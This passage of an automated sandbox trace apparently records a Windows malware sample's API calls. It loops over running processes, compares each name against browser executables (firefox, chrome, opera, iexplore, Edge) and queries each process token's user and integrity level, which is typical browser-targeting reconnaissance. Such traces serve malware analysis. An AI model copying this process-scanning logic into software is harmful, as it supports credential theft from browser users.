[3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.243] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.243] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0245.243] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0245.243] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0245.243] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0245.243] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0245.244] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0245.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0245.244] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.244] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.244] GetLastError () returned 0x7a [0245.244] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.244] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.244] CloseHandle (hObject=0x340) returned 1 [0245.244] CloseHandle (hObject=0x548) returned 1 [0245.244] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.244] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.244] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.244] GetLastError () returned 0x7a [0245.244] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.244] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.244] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.244] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.244] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0245.244] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.244] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.244] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.244] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0245.244] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.244] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.244] GetLastError () returned 0x7a [0245.244] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.244] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.245] CloseHandle (hObject=0x340) returned 1 [0245.245] CloseHandle (hObject=0x548) returned 1 [0245.245] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.245] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.245] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.245] GetLastError () returned 0x7a [0245.245] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.245] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.245] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.245] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.245] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0245.245] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.245] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.245] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.245] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0245.245] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.245] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.245] GetLastError () returned 0x7a [0245.245] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.245] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.245] CloseHandle (hObject=0x340) returned 1 [0245.245] CloseHandle (hObject=0x548) returned 1 [0245.245] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.245] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.245] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.245] GetLastError () returned 0x7a [0245.246] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.246] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.246] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.246] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.246] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.246] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.246] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.246] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.246] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0245.246] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.246] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.246] GetLastError () returned 0x7a [0245.246] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.246] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.246] CloseHandle (hObject=0x340) returned 1 [0245.246] CloseHandle (hObject=0x548) returned 1 [0245.246] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.246] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.246] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.246] GetLastError () returned 0x7a [0245.246] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.246] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.246] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.246] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0245.246] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0245.246] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0245.247] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0245.247] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0245.247] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0245.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0245.247] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.247] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.247] GetLastError () returned 0x7a [0245.247] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.247] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.247] CloseHandle (hObject=0x340) returned 1 [0245.247] CloseHandle (hObject=0x548) returned 1 [0245.247] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.247] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.247] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.247] GetLastError () returned 0x7a [0245.247] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.247] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.247] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.247] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0245.247] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0245.247] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0245.247] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0245.247] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0245.247] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0245.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0245.247] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.247] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.247] GetLastError () returned 0x7a [0245.248] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.248] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.248] CloseHandle (hObject=0x340) returned 1 [0245.248] CloseHandle (hObject=0x548) returned 1 [0245.248] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.248] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.248] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.248] GetLastError () returned 0x7a [0245.248] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.248] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.248] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.248] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0245.248] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0245.248] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0245.248] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0245.248] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0245.248] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0245.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0245.248] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.248] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.248] GetLastError () returned 0x7a [0245.248] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.248] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.248] CloseHandle (hObject=0x340) returned 1 [0245.248] CloseHandle (hObject=0x548) returned 1 [0245.248] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.248] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.249] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.249] GetLastError () returned 0x7a [0245.249] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.249] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.249] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.249] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0245.249] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0245.249] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0245.249] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0245.249] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0245.249] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0245.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0245.249] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.249] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.249] GetLastError () returned 0x7a [0245.249] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.249] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.249] CloseHandle (hObject=0x340) returned 1 [0245.249] CloseHandle (hObject=0x548) returned 1 [0245.249] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.249] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.249] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.249] GetLastError () returned 0x7a [0245.249] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.249] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.249] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.249] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.250] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0245.250] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.250] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.250] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.250] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0245.250] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.250] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.250] GetLastError () returned 0x7a [0245.250] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.250] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.250] CloseHandle (hObject=0x340) returned 1 [0245.250] CloseHandle (hObject=0x548) returned 1 [0245.250] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.250] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.250] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.250] GetLastError () returned 0x7a [0245.250] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.250] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, 